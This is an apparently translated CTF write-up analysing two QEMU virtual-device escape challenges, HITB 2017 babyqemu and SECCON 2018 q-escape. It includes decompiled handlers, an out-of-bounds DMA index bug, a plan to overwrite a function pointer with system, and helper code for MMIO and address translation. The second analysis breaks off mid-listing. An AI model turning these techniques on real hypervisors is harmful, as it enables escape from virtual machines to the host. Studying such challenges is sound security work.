Environment setup

1. Building QEMU from source

QEMU is best installed from source: the version available through apt depends on the Ubuntu release and is usually quite old.

```shell
# Download the source
wget https://download.qemu.org/qemu-5.0.0.tar.xz

# Install the build dependencies
sudo apt-get install git libglib2.0-dev libfdt-dev libpixman-1-dev zlib1g-dev

# Build and install
tar xvJf qemu-5.0.0.tar.xz
cd qemu-5.0.0
./configure
make    # this step can take around 30 minutes
sudo make install

# Check the installation
qemu-system-x86_64 --version
# QEMU emulator version 5.0.0
# Copyright (c) 2003-2020 Fabrice Bellard and the QEMU Project developers
```

2. Possible problems

- KVM kernel module: No such file or directory

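If starting QEMU fails with Could not access KVM kernel module: No such file or directory, check that hardware virtualization is enabled for the virtual machine: VM -> Settings -> Processors -> Virtualization engine -> "Virtualize Intel VT-x/EPT or AMD-V/RVI".

- KVM kernel module: Permission denied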

When starting QEMU with -enable-kvm, I got Could not access KVM kernel module: Permission denied followed by failed to initialize KVM: Permission denied. After some searching, this turned out to be a permission problem on the KVM device, so I ran:

```shell
$ sudo chown root:kvm /dev/kvm
chown: invalid group: 'root:kvm'
```

This failed as well, probably because qemu-kvm was not installed, so the kvm group did not exist yet (see https://askubuntu.com/questions/1143716/how-can-i-solve-chown-invalid-user).

```shell
$ sudo apt install qemu-kvm
```

After installing it, configure the permissions:

```
root@ubuntu:# sudo adduser $USER kvm
Adding user `root' to group `kvm' ...
Adding user root to group kvm
Done.
root@ubuntu:# chown $USER /dev/kvm
root@ubuntu:# chmod 666 /dev/kvm
root@ubuntu:# ll /dev/kvm
crw-rw---- 1 root kvm 10, 232 Nov 18 17:21 /dev/kvm
root@ubuntu:# systemctl restart libvirtd.service
Failed to restart libvirtd.service: Unit libvirtd.service not found.
root@ubuntu:# kvm-ok
INFO: /dev/kvm exists
KVM acceleration can be used
root@ubuntu:# apt install -y qemu qemu-kvm libvirt-daemon libvirt-clients bridge-utils virt-manager
```

After installing these packages, the test succeeded:

```
root@ubuntu:/home/leo/Desktop/strng/strng# systemctl status libvirtd.service
● libvirtd.service - Virtualization daemon
   Loaded: loaded (/lib/systemd/system/libvirtd.service; enabled; vendor preset:
   Active: active (running) since Wed 2020-11-18 19:06:08 PST; 48s ago
     Docs: man:libvirtd(8)
           https://libvirt.org
 Main PID: 54248 (libvirtd)
    Tasks: 19 (limit: 32768)
   CGroup: /system.slice/libvirtd.service
           ├─54248 /usr/sbin/libvirtd
           ├─54723 /usr/sbin/dnsmasq --conf-file=/var/lib/libvirt/dnsmasq/defaul
           └─54724 /usr/sbin/dnsmasq --conf-file=/var/lib/libvirt/dnsmasq/defaul
root@ubuntu:~# systemctl restart libvirtd.service
root@ubuntu:~# ./launch.sh
[    0.000000] Initializing cgroup subsys cpuset
[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Initializing cgroup subsys cpuacct
```

The guest boots successfully!

HITB GSEC2017 babyqemu

Step 1: Analyzing the device

Unpack the filesystem with the following commands:

```shell
mkdir core
cd core
cpio -idmv < ../rootfs.cpio
```

With the filesystem extracted, first look at the launch script launch.sh:

```shell
#! /bin/sh
./qemu-system-x86_64 \
-initrd ./rootfs.cpio \
-kernel ./vmlinuz-4.8.0-52-generic \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-enable-kvm \
-monitor /dev/null \
-m 64M --nographic -L ./dependency/usr/local/share/qemu \
-L pc-bios \
-device hitb,id=vda
```

The -device hitb option tells us that the VM has a PCI device called hitb.



Next, load qemu-system-x86_64 into IDA and search for functions related to hitb.

Start with the class init function. Its class pointer has to be retyped as a PCIDeviceClass, whose definition can be found under Local Types:

```c
struct PCIDeviceClass
{
  DeviceClass_0 parent_class;
  void (*realize)(PCIDevice_0 *, Error_0 **); //0xc0
  int (*init)(PCIDevice_0 *);
  PCIUnregisterFunc *exit;
  PCIConfigReadFunc *config_read;
  PCIConfigWriteFunc *config_write;
  uint16_t vendor_id; //0xe8
  uint16_t device_id; //0xea
  uint8_t revision;
  uint16_t class_id;
  uint16_t subsystem_vendor_id;
  uint16_t subsystem_id;
  int is_bridge;
  int is_express;
  const char *romfile;
};
```

```c
void __fastcall hitb_class_init(ObjectClass_0 *a1, void *data)
{
  PCIDeviceClass *v2; // rax

  v2 = object_class_dynamic_cast_assert(
         a1,
         "pci-device",
         "/mnt/hgfs/eadom/workspcae/projects/hitbctf2017/babyqemu/qemu/hw/misc/hitb.c",
         469,
         "hitb_class_init");
  v2->revision = 16;
  v2->class_id = 255;
  v2->realize = pci_hitb_realize;
  v2->exit = pci_hitb_uninit;
  v2->vendor_id = 0x1234;
  v2->device_id = 0x2333;
}
```

So the device ID is device_id=0x2333 and the vendor ID is vendor_id=0x1234.

Next, inspect the PCI I/O information from inside the guest. Running sudo ./launch.sh failed with ./qemu-system-x86_64: /usr/lib/x86_64-linux-gnu/libcurl.so.4: version `CURL_OPENSSL_3' not found (required by ./qemu-system-x86_64).

Running sudo apt-get install libcurl3 fixes it.

```
# lspci -v
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333 -> hitb
# cat /sys/devices/pci0000\:00/0000\:00\:04.0/resource
0x00000000fea00000 0x00000000feafffff 0x0000000000040200
0x0000000000000000 0x0000000000000000 0x0000000000000000
```

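Each line of the resource file has the format start end flags. The first line describes resource0 (BAR 0): the lowest bit of its flags (0x40200) is 0, which means it is a memory-mapped (MMIO) region rather than an I/O port range, located at 0xfea00000 with size 0x100000 (end - start + 1).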
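The same check can be made a little more explicit in code. A minimal sketch, assuming the "start end flags" format shown above and the IORESOURCE_IO (0x100) / IORESOURCE_MEM (0x200) bits from the Linux kernel's include/linux/ioport.h; the helper names are hypothetical:

```c
#include <stdint.h>
#include <stdio.h>

/* Resource type bits from the kernel's include/linux/ioport.h */
#define IORESOURCE_IO  0x00000100ULL
#define IORESOURCE_MEM 0x00000200ULL

struct pci_resource {
    uint64_t start;
    uint64_t end;
    uint64_t flags;
};

/* Parse one "start end flags" line of /sys/bus/pci/devices/<bdf>/resource.
   Returns 1 on success, 0 if the line does not hold three hex numbers. */
static int parse_resource_line(const char *line, struct pci_resource *r)
{
    unsigned long long s, e, f;
    if (sscanf(line, "%llx %llx %llx", &s, &e, &f) != 3)
        return 0;
    r->start = s;
    r->end = e;
    r->flags = f;
    return 1;
}

/* Unused BAR slots are all zeros; otherwise the range is inclusive. */
static uint64_t resource_size(const struct pci_resource *r)
{
    if (r->start == 0 && r->end == 0)
        return 0;
    return r->end - r->start + 1;
}

static int resource_is_mmio(const struct pci_resource *r)
{
    return (r->flags & IORESOURCE_MEM) != 0;
}

static int resource_is_pmio(const struct pci_resource *r)
{
    return (r->flags & IORESOURCE_IO) != 0;
}
```

Fed the first line above, it reports an MMIO region at 0xfea00000 of size 0x100000. Testing IORESOURCE_MEM is simply a more explicit variant of the lowest-bit rule, which is set for I/O BARs.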

Next, see what the hitb device registers by analyzing pci_hitb_realize:

```c
void __fastcall pci_hitb_realize(PCIDevice_0 *pdev, Error_0 **errp)
{
  pdev->config[61] = 1;
  if ( !msi_init(pdev, 0, 1u, 1, 0, errp) )
  {
    // timer whose callback is hitb_dma_timer (scale 1000000 ns, i.e. milliseconds)
    timer_init_tl(&pdev[1].io_regions[4], main_loop_tlg.tl[1], 1000000, hitb_dma_timer, pdev);
    qemu_mutex_init(&pdev[1].io_regions[0].type);
    qemu_cond_init(&pdev[1].io_regions[1].type);
    qemu_thread_create(&pdev[1].io_regions[0].size, "hitb", hitb_fact_thread, pdev, 0);
    // register the 0x100000-byte MMIO region; its handlers are in hitb_mmio_ops
    memory_region_init_io(&pdev[1], &pdev->qdev.parent_obj, &hitb_mmio_ops, pdev, "hitb-mmio", 0x100000uLL);
    pci_register_bar(pdev, 0, 0, &pdev[1]);
  }
}
```

It sets up a timer whose callback is hitb_dma_timer, and registers the memory operations structure hitb_mmio_ops, which contains the two handlers hitb_mmio_read and hitb_mmio_write.

This gives us the key functions:

- hitb_mmio_read
- hitb_mmio_write
- hitb_dma_timer

Step 2: Analyzing the functions

Before analyzing these three functions, we need the device's state structure. Searching Local Types for hitb turns up HitbState:

```c
struct __attribute__((aligned(16))) HitbState
{
  PCIDevice_0 pdev;
  MemoryRegion_0 mmio;
  QemuThread_0 thread;
  QemuMutex_0 thr_mutex;
  QemuCond_0 thr_cond;
  _Bool stopping;
  uint32_t addr4;
  uint32_t fact;
  uint32_t status;
  uint32_t irq_status;
  dma_state dma;
  QEMUTimer_0 dma_timer;
  char dma_buf[4096];
  void (*enc)(char *, unsigned int);
  uint64_t dma_mask;
};

struct dma_state
{
  uint64_t src;
  uint64_t dst;
  uint64_t cnt;
  uint64_t cmd;
};
```

hitb_mmio_read

```c
uint64_t __fastcall hitb_mmio_read(HitbState *opaque, hwaddr addr, unsigned int size)
{
  if ( size == 4 )
  {
    if ( addr == 128 ) return opaque->dma.src;
    if ( addr == 140 ) return *(&opaque->dma.dst + 4); // presumably the upper 32 bits of dma.dst
    if ( addr == 132 ) return *(&opaque->dma.src + 4); // presumably the upper 32 bits of dma.src
    if ( addr == 136 ) return opaque->dma.dst;
    if ( addr == 144 ) return opaque->dma.cnt;
    if ( addr == 152 ) return opaque->dma.cmd;
    if ( addr == 8 ) return opaque->fact;
    if ( addr == 4 ) return opaque->addr4;
    if ( addr == 32 ) return opaque->status;
    if ( addr == 36 ) return opaque->irq_status;
  }
  // ... (rest of the function omitted)
}
```

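For 4-byte reads, the function returns the field of the state structure selected by addr. Judging by the +4 offsets, 132 (0x84) and 140 (0x8c) access the upper 32 bits of dma.src and dma.dst.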

hitb_mmio_write

```c
void __fastcall hitb_mmio_write(HitbState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  int64_t v7; // current QEMU_CLOCK_VIRTUAL time in ns

  // offsets below 0x80: size must be 4; offsets from 0x80 up: size 4 or 8
  if ( (addr > 0x7F || size == 4) && (!((size - 4) & 0xFFFFFFFB) || addr <= 0x7F) )
  {
    if ( addr == 128 && !(opaque->dma.cmd & 1) )
      opaque->dma.src = val;
    if ( addr == 140 && !(opaque->dma.cmd & 1) )
      *(&opaque->dma.dst + 4) = val;   // presumably the upper 32 bits of dma.dst
    if ( addr == 144 && !(opaque->dma.cmd & 1) )
      opaque->dma.cnt = val;
    if ( addr == 152 && val & 1 && !(opaque->dma.cmd & 1) )
    {
      opaque->dma.cmd = val;
      v7 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL_0);
      // arm the timer: expires at v7 / 1000000 + 100 (timer scale is 1000000 ns)
      timer_mod(&opaque->dma_timer, (((4835703278458516699LL * v7) >> 64) >> 18) - (v7 >> 63) + 100);
    }
    if ( addr == 132 && !(opaque->dma.cmd & 1) )
      *(&opaque->dma.src + 4) = val;   // presumably the upper 32 bits of dma.src
    if ( addr == 136 && !(opaque->dma.cmd & 1) )
      opaque->dma.dst = val;
  }
}
```

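Every write above requires (opaque->dma.cmd & 1) == 0, i.e. no DMA request pending. The size check accepts 4-byte accesses below offset 0x80 and 4- or 8-byte accesses from 0x80 upward. Writing a value with bit 0 set to addr == 152 (0x98) stores it in dma.cmd and arms the timer, which later calls hitb_dma_timer.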
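The odd-looking expression passed to timer_mod is the compiler's multiply-and-shift form of a signed division of the virtual clock (in ns) by 1,000,000. A small sketch that reproduces it (function names are hypothetical; __int128 is a GCC/Clang extension):

```c
#include <stdint.h>

/* Signed division by 1,000,000 written the way the compiler emitted it:
   take the high 64 bits of ns * magic, shift right by 18 more bits
   (2^82 in total), then add 1 for negative inputs so the result rounds
   toward zero like C's "/" operator. */
static int64_t div_1e6_magic(int64_t ns)
{
    const __int128 magic = 4835703278458516699LL; /* ceil(2^82 / 10^6) */
    int64_t hi = (int64_t)(((__int128)ns * magic) >> 64);
    return (hi >> 18) - (ns >> 63);
}

/* Expiry value hitb_mmio_write passes to timer_mod(): "now" in ms + 100.
   The timer was created with scale 1000000 ns, so its unit is milliseconds. */
static int64_t hitb_timer_expire(int64_t now_ns)
{
    return div_1e6_magic(now_ns) + 100;
}
```

In other words, hitb_dma_timer runs about 100 ms of virtual time after the command write, not immediately.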

hitb_dma_timer

```c
void __fastcall hitb_dma_timer(HitbState *opaque)
{
  v1 = opaque->dma.cmd;
  if ( v1 & 1 )
  {
    if ( v1 & 2 )
    {
      v2 = (LODWORD(opaque->dma.src) - 0x40000);
      if ( v1 & 4 )
      { // v1 == 7
        v7 = &opaque->dma_buf[v2];
        (opaque->enc)(v7, LODWORD(opaque->dma.cnt)); // call the enc function pointer
        v3 = v7;
      }
      else
      { // v1 == 3
        v3 = &opaque->dma_buf[v2];
      }
      cpu_physical_memory_rw(opaque->dma.dst, v3, opaque->dma.cnt, 1);
      v4 = opaque->dma.cmd;
      v5 = opaque->dma.cmd & 4;
    }
    else
    { // v1 == 1
      v6 = &opaque[-36] + opaque->dma.dst - 2824;
      LODWORD(v3) = opaque + opaque->dma.dst - 0x40000 + 3000;
      cpu_physical_memory_rw(opaque->dma.src, v6, opaque->dma.cnt, 0);
      v4 = opaque->dma.cmd;
      v5 = opaque->dma.cmd & 4;
      if ( opaque->dma.cmd & 4 )
      {
        v3 = LODWORD(opaque->dma.cnt);
        (opaque->enc)(v6, v3, v5);
        v4 = opaque->dma.cmd;
        v5 = opaque->dma.cmd & 4;
      }
    }
    opaque->dma.cmd = v4 & 0xFFFFFFFFFFFFFFFELL; // clear bit 0: request done
  }
}
```

The first argument of cpu_physical_memory_rw is a guest physical address, so a guest virtual address must first be translated by reading /proc/$pid/pagemap.
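A minimal sketch of that translation, assuming the documented pagemap entry format (bit 63 = page present, bits 0-54 = page frame number) and that it runs as root inside the guest, since unprivileged readers see a PFN of 0 on recent kernels. The helper names are hypothetical, and the page should already be resident (touched, ideally locked with mlock) before it is looked up:

```c
#include <fcntl.h>
#include <stdint.h>
#include <sys/types.h>
#include <unistd.h>

#define PAGEMAP_PRESENT  (1ULL << 63)        /* bit 63: page present in RAM */
#define PAGEMAP_PFN_MASK ((1ULL << 55) - 1)  /* bits 0-54: page frame number */

/* Combine one pagemap entry with the in-page offset of vaddr.
   Returns UINT64_MAX when the page is not present. */
static uint64_t pagemap_entry_to_phys(uint64_t entry, uint64_t vaddr, uint64_t page_size)
{
    if (!(entry & PAGEMAP_PRESENT))
        return UINT64_MAX;
    return (entry & PAGEMAP_PFN_MASK) * page_size + vaddr % page_size;
}

/* Look vaddr up in /proc/self/pagemap (one 8-byte entry per virtual page). */
static uint64_t gva_to_gpa(const void *vaddr)
{
    uint64_t page_size = (uint64_t)sysconf(_SC_PAGESIZE);
    uint64_t va = (uint64_t)(uintptr_t)vaddr;
    uint64_t entry = 0;
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0)
        return UINT64_MAX;
    ssize_t n = pread(fd, &entry, sizeof(entry), (off_t)(va / page_size * sizeof(entry)));
    close(fd);
    if (n != (ssize_t)sizeof(entry))
        return UINT64_MAX;
    return pagemap_entry_to_phys(entry, va, page_size);
}
```

The resulting value is what would be written to dma.src or dma.dst when the device should read from or write to that buffer.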

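- (1) dma.cmd == 7: idx = dma.src - 0x40000; enc is called on &dma_buf[idx] (encrypting it in place), then dma.cnt bytes starting at &dma_buf[idx] are written to guest physical address dma.dst.

- (2) dma.cmd == 3: idx = dma.src - 0x40000; dma.cnt bytes starting at &dma_buf[idx] are written to guest physical address dma.dst.

- (3) dma.cmd == 1: idx = dma.dst - 0x40000; dma.cnt bytes are read from guest physical address dma.src into &dma_buf[idx] (debugging confirms that the second argument is &dma_buf[dma.dst - 0x40000]). If bit 2 is also set (dma.cmd == 5), enc is then called on that buffer.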

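So the vulnerability is in hitb_dma_timer: dma.src and dma.dst are both fully controlled through hitb_mmio_write, and idx is never checked against the size of dma_buf, so we can choose any index into dma_buf and read or write out of bounds.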

The exploitation plan:

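- (1) Set idx = 0x1000 (just past the 4096-byte dma_buf) with cmd = 3 to leak the enc function pointer stored right after dma_buf, and compute the address of system from it.

- (2) Set idx = 0x1000 again with cmd = 1 to overwrite the enc function pointer with the address of system.

- (3) Write the command "cat flag" into &dma_buf[0] and trigger enc, which now calls system(&dma_buf[0]).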
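The three steps map onto sequences of MMIO register writes. A sketch that only builds those sequences (register offsets are taken from hitb_mmio_write above; the helper names, and the assumption that the upper 32-bit halves of src/dst stay 0, are mine). Unlike the plan above, step 3 here uses a single cmd = 5 request (read into dma_buf, then enc) instead of a separate write followed by an enc call:

```c
#include <stddef.h>
#include <stdint.h>

/* hitb MMIO register offsets, as read off hitb_mmio_write */
enum {
    HITB_DMA_SRC = 0x80, /* low 32 bits of dma.src (0x84 = high half) */
    HITB_DMA_DST = 0x88, /* low 32 bits of dma.dst (0x8c = high half) */
    HITB_DMA_CNT = 0x90,
    HITB_DMA_CMD = 0x98,
};

#define HITB_DMA_BASE 0x40000u /* dma_buf index = address - 0x40000 */
#define HITB_ENC_IDX  0x1000u  /* sizeof(dma_buf): enc is stored right after it */

struct reg_write {
    uint32_t off;
    uint32_t val;
};

/* Fill out[0..3] with the four 4-byte MMIO writes of one DMA request.
   CMD goes last because writing it arms the timer. */
static size_t hitb_dma_request(uint32_t src, uint32_t dst, uint32_t cnt, uint32_t cmd,
                               struct reg_write out[4])
{
    out[0] = (struct reg_write){ HITB_DMA_SRC, src };
    out[1] = (struct reg_write){ HITB_DMA_DST, dst };
    out[2] = (struct reg_write){ HITB_DMA_CNT, cnt };
    out[3] = (struct reg_write){ HITB_DMA_CMD, cmd };
    return 4;
}

/* Step 1: copy the 8-byte enc pointer to guest physical address buf_phys (cmd 3). */
static size_t hitb_leak_enc(uint32_t buf_phys, struct reg_write out[4])
{
    return hitb_dma_request(HITB_DMA_BASE + HITB_ENC_IDX, buf_phys, 8, 3, out);
}

/* Step 2: copy 8 bytes from guest physical address buf_phys over enc (cmd 1). */
static size_t hitb_overwrite_enc(uint32_t buf_phys, struct reg_write out[4])
{
    return hitb_dma_request(buf_phys, HITB_DMA_BASE + HITB_ENC_IDX, 8, 1, out);
}

/* Step 3: read len bytes of the command into dma_buf[0], then run enc on it (cmd 1|4). */
static size_t hitb_run_cmd(uint32_t cmd_phys, uint32_t len, struct reg_write out[4])
{
    return hitb_dma_request(cmd_phys, HITB_DMA_BASE, len, 1 | 4, out);
}
```

Each entry would then be issued as a 4-byte store into the mapped BAR, for example *(volatile uint32_t *)(mmio + w[i].off) = w[i].val, with a sleep before the next request, because hitb_mmio_write ignores writes while dma.cmd & 1 is still set. The address of system is the leaked pointer minus the offset of the function enc points to, plus the offset of system@plt, both read from the binary.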

Step 3: Debugging

After writing exp.c, compile it and pack it into rootfs.cpio:

```shell
cc -O0 -static -o exp exp.c
cp exp core/root
cd core
find . | cpio -o -H newc | gzip > ../rootfs.cpio
```

After booting, find the PID of the qemu process, attach to it, set breakpoints and start debugging:

```shell
$ ps -ax | grep qemu
$ sudo gdb -q --pid=[pid]
pwndbg> file qemu-system-x86_64
pwndbg> b ...
pwndbg> c
```



Breakpoint problems

The first time I set a breakpoint, I ran into a problem.

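This is most likely because the breakpoint address was only an offset: when the program is built as PIE, a breakpoint at the bare offset cannot be inserted.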

Solution: re-attach to the process as shown below, or obtain the program's load base and compute the real breakpoint address.

```
pwndbg> detach
pwndbg> attach [pid]
```
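For the second option, the load base can be read from /proc/<pid>/maps on the host (pwndbg's vmmap shows the same mappings). A minimal sketch with hypothetical helper names that takes the text of that file and turns an address seen in IDA into a runtime address, assuming IDA's image base for the PIE binary is passed in (commonly 0):

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Return the start address of the first mapping whose line mentions `name`
   in the text of /proc/<pid>/maps, or 0 if there is none. For a PIE binary
   the first (lowest) mapping of the executable is its load base. */
static uint64_t map_base(const char *maps, const char *name)
{
    char line[512];
    while (*maps) {
        const char *nl = strchr(maps, '\n');
        size_t len = nl ? (size_t)(nl - maps) : strlen(maps);
        if (len >= sizeof(line))
            len = sizeof(line) - 1;
        memcpy(line, maps, len);
        line[len] = '\0';
        uint64_t start;
        if (strstr(line, name) && sscanf(line, "%" SCNx64, &start) == 1)
            return start;
        if (!nl)
            break;
        maps = nl + 1;
    }
    return 0;
}

/* Runtime address of an IDA address, given the image base IDA used. */
static uint64_t pie_address(uint64_t base, uint64_t ida_addr, uint64_t ida_imagebase)
{
    return base + (ida_addr - ida_imagebase);
}
```

The result can then be used directly in gdb as b *0x<address>.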

Triggering hitb_dma_timer

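While debugging the exp I hit a subtle issue: after writing to addr=152 to trigger hitb_dma_timer, if the exp does not sleep, hitb_dma_timer has not been called yet when the result is read, so nothing is leaked.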

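The reason is that timer_mod's expire_time argument means the callback (cb) is only invoked once that time has passed (here about 100 ms of virtual time after the write), so every step of the exp that relies on hitb_dma_timer needs a sleep afterwards.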

2018_seccon_q-escape

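In this challenge the vulnerability was created by modifying the code of an existing QEMU device. Such code is usually large, so it is best to diff it against the original source to locate the vulnerable spot quickly.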

Step 1: Analyzing the device

```
[*] '~/seccon_2018_q-escape/qemu-system-x86_64'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    FORTIFY:  Enabled
```

After extracting the archive we get the filesystem; look at ./run.sh:

```shell
#!/bin/sh
./qemu-system-x86_64 \
-m 64 \
-initrd ./initramfs.igz \
-kernel ./vmlinuz-4.15.0-36-generic \
-append "priority=low console=ttyS0" \
-nographic \
-L ./pc-bios \
-vga std \
-device cydf-vga \
-monitor telnet:127.0.0.1:2222,server,nowait
```

The device is named cydf-vga, and the QEMU monitor is reachable over telnet (127.0.0.1:2222).



Load qemu-system-x86_64 into IDA and look for functions related to the cydf-vga device.

Start with the init function cydf_vga_class_init; again, the class pointer has to be retyped as PCIDeviceClass:

```c
void __fastcall cydf_vga_class_init(ObjectClass_0 *klass, void *data)
{
  PCIDeviceClass *v2; // rbx
  PCIDeviceClass *v3; // rax

  v2 = object_class_dynamic_cast_assert(
         klass,
         "device",
         "/home/dr0gba/pwn/seccon/qemu-3.0.0/hw/display/cydf_vga.c",
         3223,
         "cydf_vga_class_init");
  v3 = object_class_dynamic_cast_assert(
         klass,
         "pci-device",
         "/home/dr0gba/pwn/seccon/qemu-3.0.0/hw/display/cydf_vga.c",
         3224,
         "cydf_vga_class_init");
  v3->realize = pci_cydf_vga_realize;
  v3->romfile = "vgabios-cydf.bin";
  v3->vendor_id = 0x1013;
  v3->device_id = 0xB8;
  v3->class_id = 0x300;
  v2->parent_class.desc = "Cydf CLGD 54xx VGA";
  v2->parent_class.categories[0] |= 0x20uLL;
  v2->parent_class.vmsd = &vmstate_pci_cydf_vga;
  v2->parent_class.props = pci_vga_cydf_properties;
  v2->parent_class.hotpluggable = 0;
}
```

So the cydf_vga PCI device has device_id=0xb8 and vendor_id=0x1013. Its parent_class description is Cydf CLGD 54xx VGA, so search the QEMU source for this string:

```
leo@ubuntu:~/qemu-5.0.0/hw/display$ grep -r "Cydf CLGD 54xx VGA" ./
leo@ubuntu:~/qemu-5.0.0/hw/display$ grep -r "CLGD 54xx VGA" ./
./cirrus_vga_rop2.h: * QEMU Cirrus CLGD 54xx VGA Emulator.
Binary file ./cirrus_vga.o matches
./cirrus_vga_internal.h: * QEMU Cirrus CLGD 54xx VGA Emulator, ISA bus support
./cirrus_vga_isa.c: * QEMU Cirrus CLGD 54xx VGA Emulator, ISA bus support
Binary file ./.cirrus_vga.c.swp matches
./cirrus_vga_rop.h: * QEMU Cirrus CLGD 54xx VGA Emulator.
./cirrus_vga.c: * QEMU Cirrus CLGD 54xx VGA Emulator.
./cirrus_vga.c: dc->desc = "Cirrus CLGD 54xx VGA";
```

cirrus_vga.c contains a very similar string, so the Cydf device was most likely created by modifying the Cirrus CLGD 54xx VGA Emulator device.

An error when starting QEMU, and its fix:

```shell
$ ./run.sh
./qemu-system-x86_64: error while loading shared libraries: libcapstone.so.3: cannot open shared object file: No such file or directory
$ sudo apt-get install libcapstone3
```

```
/ # lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:01.0 Class 0601: 8086:7000
00:04.0 Class 0300: 1013:00b8 -> cydf_vga
/ # cat /sys/devices/pci0000\:00/0000\:00\:04.0/resource
0x00000000fa000000 0x00000000fbffffff 0x0000000000042208
0x00000000febc1000 0x00000000febc1fff 0x0000000000040200
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000
0x00000000febb0000 0x00000000febbffff 0x0000000000046200
```

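There are three memory regions: BAR 0 at 0xfa000000 (size 0x2000000), BAR 1 at 0xfebc1000 (size 0x1000), and, on the last line (resource 6, the expansion ROM slot), 0xfebb0000 (size 0x10000).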

In pci_cydf_vga_realize, the interesting part is cydf_init_common:

```c
// cydf_init_common
memory_region_init_io(&s->cydf_vga_io, owner, &cydf_vga_io_ops, s, "cydf-io", 0x30uLL);
memory_region_init_io(&s->low_mem, owner, &cydf_vga_mem_ops, s, "cydf-low-memory", 0x20000uLL);
memory_region_init_io(&s->cydf_mmio_io, owner, &cydf_mmio_io_ops, s, "cydf-mmio", 0x1000uLL);
```

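Looking only at the regions that belong to the cydf device, it registers a 0x30-byte PMIO region, a 0x20000-byte MMIO region and a 0x1000-byte MMIO region. The PMIO port range does not appear in the resource file, so check /proc/ioports: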

```
/ # cat /proc/ioports
...
03c0-03df : vga+
...
```

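The vga+ entry covers 0x3c0-0x3df, which is 0x20 ports rather than 0x30. It is the upper part of the 0x30-byte cydf-io region, which (presumably as in cirrus_vga.c, where the cirrus-io region is mapped at 0x3b0) spans 0x3b0-0x3df. This is why the exp later calls ioperm(0x3b0, 0x30, 1).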

According to vgamem, VGA video memory is mapped into the address space at 0xa0000-0xbffff, so look up that range in /proc/iomem:

```
/ # cat /proc/iomem
...
000a0000-000bffff : PCI Bus 0000:00
...
```

cydf_vga_io_ops, cydf_vga_mem_ops and cydf_mmio_io_ops give us the access handlers:

- cydf_vga_ioport_read
- cydf_vga_ioport_write
- cydf_vga_mem_read
- cydf_vga_mem_write
- cydf_mmio_read
- cydf_mmio_write

Step 2: Analyzing the functions

Before analyzing the handlers, we need the device's state structure; searching Local Types for Cydf turns up CydfVGAState.

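Comparing cydf_vga_mem_write with cirrus_vga_mem_write in the QEMU source shows that the original handles only two cases, addr < 0x10000 and 0x18000 <= addr < 0x18100, while cydf_vga_mem_write adds a third case for addr >= 0x18100. That branch is where the analysis should focus: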

```c
// cydf_vga_mem_write, branch for addr >= 0x18100 (excerpt)
v6 = 205 * opaque->vga.sr[0xCC];
LOWORD(v6) = opaque->vga.sr[0xCC] / 5u;
v7 = opaque->vga.sr[0xCC] - 5 * v6;              // v7 = sr[0xCC] % 5
if ( *&opaque->vga.sr[205] )                     // idx = mem_value & 0xff0000
  LODWORD(mem_value) = (opaque->vga.sr[205] << 16) | (opaque->vga.sr[206] << 8) | mem_value;
if ( v7 == 2 )
{
  v24 = BYTE2(mem_value);
  if ( v24 <= 0x10 && *(&opaque->vga.vram_ptr + 2 * (v24 + 4925)) )
    __printf_chk(1LL);
}
else
{
  if ( v7 <= 2u )
  {
    if ( v7 == 1 )
    { // opaque->vs[idx].buf[cur_size++] = mem_value, only while cur_size < max_size
      if ( BYTE2(mem_value) > 0x10uLL )
        return;
      v8 = (opaque + 16 * BYTE2(mem_value));
      v9 = v8->vs[offsetof(CydfVGAState, vga)].buf;
      if ( !v9 )
        return;
      v10 = v8->vs[0].cur_size;
      if ( v10 >= v8->vs[0].max_size )
        return;
LABEL_26:
      v8->vs[0].cur_size = v10 + 1;
      v9[v10] = mem_value;
      return;
    }
    goto LABEL_35;
  }
  if ( v7 != 3 )
  {
    if ( v7 == 4 )
    { // opaque->vs[idx].buf[cur_size++] = mem_value
      // cur_size is only checked against 0xfff, not against max_size
      if ( BYTE2(mem_value) > 0x10uLL )
        return;
      v8 = (opaque + 16 * BYTE2(mem_value));
      v9 = v8->vs[0].buf;
      if ( !v9 )
        return;
      v10 = v8->vs[0].cur_size;
      if ( v10 > 0xFFF )
        return;
      goto LABEL_26;
    }
LABEL_35:
    // v7 == 0
    // opaque->vs[vulncnt++].buf = malloc(mem_value)
    v20 = vulncnt;
    if ( vulncnt <= 0x10 && mem_value <= 0x1000uLL )
    {
      mem_valuea = mem_value;
      v21 = malloc(mem_value);
      v22 = (opaque + 16 * v20);
      v22->vs[0].buf = v21;
      if ( v21 )
      {
        vulncnt = v20 + 1;
        v22->vs[0].max_size = mem_valuea;
      }
    }
    return;
  }
  if ( BYTE2(mem_value) <= 0x10uLL )
  { // v7 == 3
    // opaque->vs[idx].max_size = mem_value
    v23 = (opaque + 16 * BYTE2(mem_value));
    if ( v23->vs[0].buf )
    {
      if ( mem_value <= 0x1000u )
        *&v23->vs[0].max_size = mem_value;
    }
  }
}
```

v7 is determined by opaque->vga.sr[204] (sr[0xCC]): v7 = sr[0xCC] % 5. Where does sr[0xCC] come from? It turns out that cydf_vga_ioport_write lets us control the contents of the opaque->vga.sr[] array:

```c
// cydf_vga_ioport_write (excerpt)
case 0x3C4uLL:
  opaque->vga.sr_index = v4;
  break;
case 0x3C5uLL:
  v10 = opaque->vga.sr_index;
  switch ( v10 )
  {
    case 8: case 9: case 0xA: case 0xB: case 0xC: case 0xD: case 0xE: case 0xF:
    case 0x13: case 0x14: case 0x15: case 0x16:
    case 0x18: case 0x19: case 0x1A: case 0x1B: case 0x1C: case 0x1D: case 0x1E: case 0x1F:
    case 0xCC:
    case 0xCD:
